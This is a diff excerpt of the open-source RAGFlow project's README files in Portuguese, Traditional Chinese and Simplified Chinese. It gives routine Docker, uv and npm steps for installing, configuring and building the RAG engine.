+ > vm.max_map_count=262144
159
+ > ```
160
+
161
+ 2. Clone o repositório:
162
+
163
+ ```bash
164
+ $ git clone https://github.com/infiniflow/ragflow.git
165
+ ```
166
+
167
+ 3. Inicie o servidor usando as imagens Docker pré-compiladas:
168
+
169
+ > O comando abaixo baixa a edição `v0.16.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.16.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` para a edição completa `v0.16.0`.
170
+
171
+ ```bash
172
+ $ cd ragflow
173
+ $ docker compose -f docker/docker-compose.yml up -d
174
+ ```
175
+
176
+ | Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
177
+ | --------------------- | ---------------------- | ------------------------------- | ------------------------ |
178
+ | v0.16.0 | ~9 | :heavy_check_mark: | Lançamento estável |
179
+ | v0.16.0-slim | ~2 | ❌ | Lançamento estável |
180
+ | nightly | ~9 | :heavy_check_mark: | _Instável_ build noturno |
181
+ | nightly-slim | ~2 | ❌ | _Instável_ build noturno |
182
+
183
+ 4. Verifique o status do servidor após tê-lo iniciado:
184
+
185
+ ```bash
186
+ $ docker logs -f ragflow-server
187
+ ```
188
+
189
+ _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
190
+
191
+ ```bash
192
+ ____ ___ ______ ______ __
193
+ / __ \ / | / ____// ____// /____ _ __
194
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
195
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
196
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
197
+
198
+ * Running on all addresses (0.0.0.0)
199
+ * Running on http://127.0.0.1:9380
200
+ * Running on http://x.x.x.x:9380
201
+ INFO:werkzeug:Press CTRL+C to quit
202
+ ```
203
+
204
+ > Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
205
+
206
+ 5. No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
207
+
208
+ > Com as configurações padrão, você só precisa digitar `http://IP_DA_SUA_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida.
209
+
210
+ 6. Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
211
+
212
+ > Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
213
+
214
+ _O show está no ar!_
215
+
216
+ ## 🔧 Configurações
217
+
218
+ Quando se trata de configurações do sistema, você precisará gerenciar os seguintes arquivos:
219
+
220
+ - [.env](./docker/.env): Contém as configurações fundamentais para o sistema, como `SVR_HTTP_PORT`, `MYSQL_PASSWORD` e `MINIO_PASSWORD`.
221
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configura os serviços de back-end. As variáveis de ambiente neste arquivo serão automaticamente preenchidas quando o contêiner Docker for iniciado. Quaisquer variáveis de ambiente definidas dentro do contêiner Docker estarão disponíveis para uso, permitindo personalizar o comportamento do serviço com base no ambiente de implantação.
222
+ - [docker-compose.yml](./docker/docker-compose.yml): O sistema depende do [docker-compose.yml](./docker/docker-compose.yml) para iniciar.
223
+
224
+ > O arquivo [./docker/README](./docker/README.md) fornece uma descrição detalhada das configurações do ambiente e dos serviços, que podem ser usadas como `${ENV_VARS}` no arquivo [service_conf.yaml.template](./docker/service_conf.yaml.template).
225
+
226
+ Para atualizar a porta HTTP de serviço padrão (80), vá até [docker-compose.yml](./docker/docker-compose.yml) e altere `80:80` para `<SUA_PORTA_DE_SERVIÇO>:80`.
227
+
228
+ Atualizações nas configurações acima exigem um reinício de todos os contêineres para que tenham efeito:
229
+
230
+ > ```bash
231
+ > $ docker compose -f docker/docker-compose.yml up -d
232
+ > ```
233
+
234
+ ### Mudar o mecanismo de documentos de Elasticsearch para Infinity
235
+
236
+ O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetores. Para mudar para o [Infinity](https://github.com/infiniflow/infinity/), siga estas etapas:
237
+
238
+ 1. Pare todos os contêineres em execução:
239
+
240
+ ```bash
241
+ $ docker compose -f docker/docker-compose.yml down -v
242
+ ```
243
+
244
+ 2. Defina `DOC_ENGINE` no **docker/.env** para `infinity`.
245
+
246
+ 3. Inicie os contêineres:
247
+
248
+ ```bash
249
+ $ docker compose -f docker/docker-compose.yml up -d
250
+ ```
251
+
252
+ > [!WARNING]
253
+ > A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
254
+
255
+ ## 🔧 Criar uma imagem Docker sem modelos de incorporação
256
+
257
+ Esta imagem tem cerca de 2 GB de tamanho e depende de serviços externos de LLM e incorporação.
258
+
259
+ ```bash
260
+ git clone https://github.com/infiniflow/ragflow.git
261
+ cd ragflow/
262
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
263
+ ```
264
+
265
+ ## 🔧 Criar uma imagem Docker incluindo modelos de incorporação
266
+
267
+ Esta imagem tem cerca de 9 GB de tamanho. Como inclui modelos de incorporação, depende apenas de serviços externos de LLM.
268
+
269
+ ```bash
270
+ git clone https://github.com/infiniflow/ragflow.git
271
+ cd ragflow/
272
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
273
+ ```
274
+
275
+ ## 🔨 Lançar o serviço a partir do código-fonte para desenvolvimento
276
+
277
+ 1. Instale o `uv`, ou pule esta etapa se ele já estiver instalado:
278
+
279
+ ```bash
280
+ pipx install uv
281
+ ```
282
+
283
+ 2. Clone o código-fonte e instale as dependências Python:
284
+
285
+ ```bash
286
+ git clone https://github.com/infiniflow/ragflow.git
287
+ cd ragflow/
288
+ uv sync --python 3.10 --all-extras # instala os módulos Python dependentes do RAGFlow
289
+ ```
290
+
291
+ 3. Inicie os serviços dependentes (MinIO, Elasticsearch, Redis e MySQL) usando Docker Compose:
292
+
293
+ ```bash
294
+ docker compose -f docker/docker-compose-base.yml up -d
295
+ ```
296
+
297
+ Adicione a seguinte linha ao arquivo `/etc/hosts` para resolver todos os hosts especificados em **docker/.env** para `127.0.0.1`:
298
+
299
+ ```
300
+ 127.0.0.1 es01 infinity mysql minio redis
301
+ ```
302
+
303
+ 4. Se não conseguir acessar o HuggingFace, defina a variável de ambiente `HF_ENDPOINT` para usar um site espelho:
304
+
305
+ ```bash
306
+ export HF_ENDPOINT=https://hf-mirror.com
307
+ ```
308
+
309
+ 5. Lance o serviço de back-end:
310
+
311
+ ```bash
312
+ source .venv/bin/activate
313
+ export PYTHONPATH=$(pwd)
314
+ bash docker/launch_backend_service.sh
315
+ ```
316
+
317
+ 6. Instale as dependências do front-end:
318
+
319
+ ```bash
320
+ cd web
321
+ npm install
322
+ ```
323
+
324
+ 7. Lance o serviço de front-end:
325
+
326
+ ```bash
327
+ npm run dev
328
+ ```
329
+
330
+ _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
331
+
332
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
333
+
334
+ ## 📚 Documentação
335
+
336
+ - [Início rápido](https://ragflow.io/docs/dev/)
337
+ - [Guia do usuário](https://ragflow.io/docs/dev/category/guides)
338
+ - [Referências](https://ragflow.io/docs/dev/category/references)
339
+ - [FAQ](https://ragflow.io/docs/dev/faq)
340
+
341
+ ## 📜 Roadmap
342
+
343
+ Veja o [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
344
+
345
+ ## 🏄 Comunidade
346
+
347
+ - [Discord](https://discord.gg/4XxujFgUN7)
348
+ - [Twitter](https://twitter.com/infiniflowai)
349
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
350
+
351
+ ## 🙌 Contribuindo
352
+
353
+ O RAGFlow prospera por meio da colaboração de código aberto. Com esse espírito, abraçamos contribuições diversas da comunidade.
354
+ Se você deseja fazer parte, primeiro revise nossas [Diretrizes de Contribuição](./CONTRIBUTING.md).
ragflow-main/README_tzh.md ADDED
@@ -0,0 +1,353 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a> |
12
+ <a href="./README_id.md">Bahasa Indonesia</a> |
13
+ <a href="/README_pt_br.md">Português (Brasil)</a>
14
+ </p>
15
+
16
+ <p align="center">
17
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
18
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
19
+ </a>
20
+ <a href="https://demo.ragflow.io" target="_blank">
21
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
22
+ </a>
23
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
24
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
25
+ </a>
26
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
27
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
28
+ </a>
29
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
30
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
31
+ </a>
32
+ </p>
33
+
34
+ <h4 align="center">
35
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
36
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
37
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
38
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
39
+ <a href="https://demo.ragflow.io">Demo</a>
40
+ </h4>
41
+
42
+ ## 💡 RAGFlow 是什麼?
43
+
44
+ [RAGFlow](https://ragflow.io/) 是一款基於深度文件理解所建構的開源 RAG(Retrieval-Augmented Generation)引擎。 RAGFlow 可以為各種規模的企業及個人提供一套精簡的 RAG 工作流程,結合大語言模型(LLM)針對用戶各類不同的複雜格式數據提供可靠的問答以及有理有據的引用。
45
+
46
+ ## 🎮 Demo 試用
47
+
48
+ 請登入網址 [https://demo.ragflow.io](https://demo.ragflow.io) 試用 demo。
49
+
50
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
51
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
52
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
53
+ </div>
54
+
55
+ ## 🔥 近期更新
56
+
57
+ - 2025-02-05 更新「SILICONFLOW」的型號清單並新增 Deepseek-R1/DeepSeek-V3 的支援。
58
+ - 2025-01-26 最佳化知識圖譜的擷取與應用,提供了多種配置選擇。
59
+ - 2024-12-18 升級了 Deepdoc 的文檔佈局分析模型。
60
+ - 2024-12-04 支援知識庫的 Pagerank 分數。
61
+ - 2024-11-22 完善了 Agent 中的變數定義和使用。
62
+ - 2024-11-01 對解析後的 chunk 加入關鍵字抽取和相關問題產生以提高回想的準確度。
63
+ - 2024-08-22 支援用 RAG 技術實現從自然語言到 SQL 語句的轉換。
64
+
65
+ ## 🎉 關注項目
66
+
67
+ ⭐️ 點擊右上角的 Star 追蹤 RAGFlow,可以取得最新發布的即時通知 !🌟
68
+
69
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
70
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
71
+ </div>
72
+
73
+ ## 🌟 主要功能
74
+
75
+ ### 🍭 **"Quality in, quality out"**
76
+
77
+ - 基於[深度文件理解](./deepdoc/README.md),能夠從各類複雜格式的非結構化資料中提取真知灼見。
78
+ - 真正在無限上下文(token)的場景下快速完成大海撈針測試。
79
+
80
+ ### 🍱 **基於模板的文字切片**
81
+
82
+ - 不只是智能,更重要的是可控可解釋。
83
+ - 多種文字範本可供選擇
84
+
85
+ ### 🌱 **有理有據、最大程度降低幻覺(hallucination)**
86
+
87
+ - 文字切片過程視覺化,支援手動調整。
88
+ - 有理有據:答案提供關鍵引用的快照並支持追根溯源。
89
+
90
+ ### 🍔 **相容各類異質資料來源**
91
+
92
+ - 支援豐富的文件類型,包括 Word 文件、PPT、excel 表格、txt 檔案、圖片、PDF、影印件、複印件、結構化資料、網頁等。
93
+
94
+ ### 🛀 **全程無憂、自動化的 RAG 工作流程**
95
+
96
+ - 全面優化的 RAG 工作流程可以支援從個人應用乃至超大型企業的各類生態系統。
97
+ - 大語言模型 LLM 以及向量模型皆支援配置。
98
+ - 基於多路召回、融合重排序。
99
+ - 提供易用的 API,可輕鬆整合到各類企業系統。
100
+
101
+ ## 🔎 系統架構
102
+
103
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
104
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
105
+ </div>
106
+
107
+ ## 🎬 快速開始
108
+
109
+ ### 📝 前提條件
110
+
111
+ - CPU >= 4 核
112
+ - RAM >= 16 GB
113
+ - Disk >= 50 GB
114
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
115
+ > 如果你並沒有在本機安裝 Docker(Windows、Mac 或 Linux), 可以參考文件 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安裝。
116
+
117
+ ### 🚀 啟動伺服器
118
+
119
+ 1. 確保 `vm.max_map_count` 不小於 262144:
120
+
121
+ > 如需確認 `vm.max_map_count` 的大小:
122
+ >
123
+ > ```bash
124
+ > $ sysctl vm.max_map_count
125
+ > ```
126
+ >
127
+ > 如果 `vm.max_map_count` 的值小於 262144,可以進行重設:
128
+ >
129
+ > ```bash
130
+ > # 這裡我們設為 262144:
131
+ > $ sudo sysctl -w vm.max_map_count=262144
132
+ > ```
133
+ >
134
+ > 你的改動會在下次系統重新啟動時被重置。如果希望做永久改動,還需要在 **/etc/sysctl.conf** 檔案裡把 `vm.max_map_count` 的值再相應更新一遍:
135
+ >
136
+ > ```bash
137
+ > vm.max_map_count=262144
138
+ > ```
139
+
140
+ 2. 克隆倉庫:
141
+
142
+ ```bash
143
+ $ git clone https://github.com/infiniflow/ragflow.git
144
+ ```
145
+
146
+ 3. 進入 **docker** 資料夾,利用事先編譯好的 Docker 映像啟動伺服器:
147
+
148
+ > 執行以下指令會自動下載 RAGFlow slim Docker 映像 `v0.16.0-slim`。請參考下表查看不同 Docker 發行版的說明。如需下載不同於 `v0.16.0-slim` 的 Docker 映像,請在執行 `docker compose` 啟動服務之前先更新 **docker/.env** 檔案內的 `RAGFLOW_IMAGE` 變數。例如,你可以透過設定 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` 來下載 RAGFlow 鏡像的 `v0.16.0` 完整發行版。
149
+
150
+ ```bash
151
+ $ cd ragflow
152
+ $ docker compose -f docker/docker-compose.yml up -d
153
+ ```
154
+
155
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
156
+ | ----------------- | --------------- | --------------------- | ------------------------ |
157
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
158
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
159
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
160
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
161
+
162
+ > [!TIP]
163
+ > 如果你遇到 Docker 映像檔拉不下來的問題,可以在 **docker/.env** 檔案內根據變數 `RAGFLOW_IMAGE` 的註解提示選擇華為雲或阿里雲的對應映像。
164
+ >
165
+ > - 華為雲鏡像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
166
+ > - 阿里雲鏡像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
167
+
168
+ 4. 伺服器啟動成功後再次確認伺服器狀態:
169
+
170
+ ```bash
171
+ $ docker logs -f ragflow-server
172
+ ```
173
+
174
+ _出現以下介面提示說明伺服器啟動成功:_
175
+
176
+ ```bash
177
+ ____ ___ ______ ______ __
178
+ / __ \ / | / ____// ____// /____ _ __
179
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
180
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
181
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
182
+
183
+ * Running on all addresses (0.0.0.0)
184
+ * Running on http://127.0.0.1:9380
185
+ * Running on http://x.x.x.x:9380
186
+ INFO:werkzeug:Press CTRL+C to quit
187
+ ```
188
+
189
+ > 如果您跳過這一步系統確認步驟就登入 RAGFlow,你的瀏覽器有可能會提示 `network anormal` 或 `網路異常`,因為 RAGFlow 可能並未完全啟動成功。
190
+
191
+ 5. 在你的瀏覽器中輸入你的伺服器對應的 IP 位址並登入 RAGFlow。
192
+ > 上面這個範例中,您只需輸入 http://IP_OF_YOUR_MACHINE 即可:未改動過設定則無需輸入連接埠(預設的 HTTP 服務連接埠 80)。
193
+ 6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案的 `user_default_llm` 欄位設定 LLM factory,並在 `API_KEY` 欄填入和你選擇的大模型相對應的 API key。
194
+
195
+ > 詳見 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
196
+
197
+ _好戲開始,接著奏樂接著舞!_
198
+
199
+ ## 🔧 系統配置
200
+
201
+ 系統配置涉及以下三份文件:
202
+
203
+ - [.env](./docker/.env):存放一些基本的系統環境變量,例如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
204
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template):設定各類別後台服務。
205
+ - [docker-compose.yml](./docker/docker-compose.yml): 系統依賴該檔案完成啟動。
206
+
207
+ 請務必確保 [.env](./docker/.env) 檔案中的變數設定與 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案中的設定保持一致!
208
+
209
+ 如果無法存取映像網站 hub.docker.com 或模型網站 huggingface.co,請依照 [.env](./docker/.env) 註解修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
210
+
211
+ > [./docker/README](./docker/README.md) 解釋了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的環境變數設定和服務配置。
212
+
213
+ 如需更新預設的 HTTP 服務連接埠(80), 可以在[docker-compose.yml](./docker/docker-compose.yml) 檔案中將配置`80:80` 改為`<YOUR_SERVING_PORT>:80` 。
214
+
215
+ > 所有系統配置都需要透過系統重新啟動生效:
216
+ >
217
+ > ```bash
218
+ > $ docker compose -f docker/docker-compose.yml up -d
219
+ > ```
220
+
221
+ ### 把文檔引擎從 Elasticsearch 切換成為 Infinity
222
+
223
+ RAGFlow 預設使用 Elasticsearch 儲存文字和向量資料. 如果要切換為 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步驟進行:
224
+
225
+ 1. 停止所有容器運作:
226
+
227
+ ```bash
228
+ $ docker compose -f docker/docker-compose.yml down -v
229
+ ```
230
+
231
+ 2. 設定 **docker/.env** 目錄中的 `DOC_ENGINE` 為 `infinity`.
232
+
233
+ 3. 啟動容器:
234
+
235
+ ```bash
236
+ $ docker compose -f docker/docker-compose.yml up -d
237
+ ```
238
+
239
+ > [!WARNING]
240
+ > Infinity 目前官方並未正式支援在 Linux/arm64 架構下的機器上運行.
241
+
242
+ ## 🔧 原始碼編譯 Docker 映像(不含 embedding 模型)
243
+
244
+ 本 Docker 映像大小約 2 GB 左右並且依賴外部的大模型和 embedding 服務。
245
+
246
+ ```bash
247
+ git clone https://github.com/infiniflow/ragflow.git
248
+ cd ragflow/
249
+ docker build --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
250
+ ```
251
+
252
+ ## 🔧 原始碼編譯 Docker 映像(包含 embedding 模型)
253
+
254
+ 本 Docker 大小約 9 GB 左右。由於已包含 embedding 模型,所以只需依賴外部的大模型服務即可。
255
+
256
+ ```bash
257
+ git clone https://github.com/infiniflow/ragflow.git
258
+ cd ragflow/
259
+ docker build --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
260
+ ```
261
+
262
+ ## 🔨 以原始碼啟動服務
263
+
264
+ 1. 安裝 uv。如已安裝,可跳過此步驟:
265
+
266
+ ```bash
267
+ pipx install uv
268
+ export UV_INDEX=https://pypi.tuna.tsinghua.edu.cn/simple
269
+ ```
270
+
271
+ 2. 下載原始碼並安裝 Python 依賴:
272
+
273
+ ```bash
274
+ git clone https://github.com/infiniflow/ragflow.git
275
+ cd ragflow/
276
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
277
+ ```
278
+
279
+ 3. 透過 Docker Compose 啟動依賴的服務(MinIO, Elasticsearch, Redis, and MySQL):
280
+
281
+ ```bash
282
+ docker compose -f docker/docker-compose-base.yml up -d
283
+ ```
284
+
285
+ 在 `/etc/hosts` 中加入以下程式碼,將 **conf/service_conf.yaml** 檔案中的所有 host 位址都解析為 `127.0.0.1`:
286
+
287
+ ```
288
+ 127.0.0.1 es01 infinity mysql minio redis
289
+ ```
290
+
291
+ 4. 如果無法存取 HuggingFace,可以把環境變數 `HF_ENDPOINT` 設為對應的鏡像網站:
292
+
293
+ ```bash
294
+ export HF_ENDPOINT=https://hf-mirror.com
295
+ ```
296
+
297
+ 5. 啟動後端服務:
298
+ ```bash
299
+ source .venv/bin/activate
300
+ export PYTHONPATH=$(pwd)
301
+ bash docker/launch_backend_service.sh
302
+
303
+ ```
304
+
305
+ 6. 安裝前端依賴:
306
+ ```bash
307
+ cd web
308
+ npm install
309
+ ```
310
+
311
+ 7. 啟動前端服務:
312
+ ```bash
313
+ npm run dev
314
+
315
+ ```
316
+
317
+ _以下界面說明系統已成功啟動:_
318
+
319
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
320
+
321
+
322
+ ## 📚 技術文檔
323
+
324
+ - [Quickstart](https://ragflow.io/docs/dev/)
325
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
326
+ - [References](https://ragflow.io/docs/dev/category/references)
327
+ - [FAQ](https://ragflow.io/docs/dev/faq)
328
+
329
+ ## 📜 路線圖
330
+
331
+ 詳見 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
332
+
333
+ ## 🏄 開源社群
334
+
335
+ - [Discord](https://discord.gg/4XxujFgUN7)
336
+ - [Twitter](https://twitter.com/infiniflowai)
337
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
338
+
339
+ ## 🙌 貢獻指南
340
+
341
+ RAGFlow 只有透過開源協作才能蓬勃發展。秉持這項精神,我們歡迎來自社區的各種貢獻。如果您有意參與其中,請查閱我們的 [貢獻者指南](./CONTRIBUTING.md) 。
342
+
343
+ ## 🤝 商務合作
344
+
345
+ - [預約諮詢](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
346
+
347
+ ## 👥 加入社區
348
+
349
+ 掃二維碼加入 RAGFlow 小助手,進 RAGFlow 交流群。
350
+
351
+ <p align="center">
352
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
353
+ </p>
ragflow-main/README_zh.md ADDED
@@ -0,0 +1,352 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow 是什么?
44
+
45
+ [RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
46
+
47
+ ## 🎮 Demo 试用
48
+
49
+ 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 近期更新
57
+
58
+ - 2025-02-05 更新硅基流动的模型列表,增加了对 Deepseek-R1/DeepSeek-V3 的支持。
59
